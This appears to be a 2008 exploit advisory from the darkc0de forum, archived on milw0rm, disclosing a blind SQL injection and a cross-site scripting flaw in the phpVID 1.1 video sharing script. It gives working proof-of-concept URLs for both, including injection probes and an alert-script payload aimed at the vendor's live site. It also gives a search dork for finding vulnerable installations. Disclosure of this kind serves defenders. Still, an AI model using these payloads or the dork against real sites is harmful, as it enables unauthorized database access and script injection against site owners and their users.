62 lines
No EOL
2.2 KiB
Text
62 lines
No EOL
2.2 KiB
Text
################################################################
|
|
# .___ __ _______ .___ #
|
|
# __| _/____ _______| | __ ____ \ _ \ __| _/____ #
|
|
# / __ |\__ \\_ __ \ |/ // ___\/ /_\ \ / __ |/ __ \ #
|
|
# / /_/ | / __ \| | \/ <\ \___\ \_/ \/ /_/ \ ___/ #
|
|
# \____ |(______/__| |__|_ \\_____>\_____ /\_____|\____\ #
|
|
# \/ \/ \/ #
|
|
# ___________ ______ _ __ #
|
|
# _/ ___\_ __ \_/ __ \ \/ \/ / #
|
|
# \ \___| | \/\ ___/\ / #
|
|
# \___ >__| \___ >\/\_/ #
|
|
# est.2007 \/ \/ forum.darkc0de.com #
|
|
################################################################
|
|
# --d3hydr8 -rsauron-baltazar -sinner_01 -C1c4Tr1Z - beenu #
|
|
# ---QKrun1x-P47tr1ck - FeDeReR -MAGE -JeTFyrE #
|
|
# and all darkc0de members ---#
|
|
################################################################
|
|
#
|
|
# Author: r45c4l
|
|
#
|
|
# Home : www.darkc0de.com
|
|
#
|
|
# Email : r45c4l@hotmail.com
|
|
#
|
|
# Share the c0de!
|
|
#
|
|
################################################################
|
|
#
|
|
# Title: phpVID 1.1 The video sharing script! Multiple Vulnerabilities
|
|
#
|
|
# Vendor: http://www.vastal.com/phpvid-the-video-sharing-software.html
|
|
# Vulnerable Version: 1.1
|
|
#
|
|
###########################################################
|
|
#
|
|
# d0rk:Powered By Vastal I-Tech's phpVID.
|
|
#
|
|
#
|
|
###########################################################
|
|
|
|
Vulnerabilities
|
|
|
|
Blind SQL Injection in "groups.php" in the "cat" parameter.
|
|
Cross Site Scripting in "search_results.php"
|
|
|
|
|
|
POC:
|
|
http://www.site.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
|
|
http://www.site.com/search_results.php?query=[XSS]
|
|
|
|
|
|
Live Demo:
|
|
http://www.phpvid.com/groups.php?type=&&cat=4+and+substring(@@version,1,1)=4
|
|
http://www.phpvid.com/search_results.php?query=<script>alert(0);</script>
|
|
|
|
|
|
###########################################################
|
|
#
|
|
# Bug discovered : 10 Sep.2008
|
|
###########################################################
|
|
|
|
# milw0rm.com [2008-09-10] |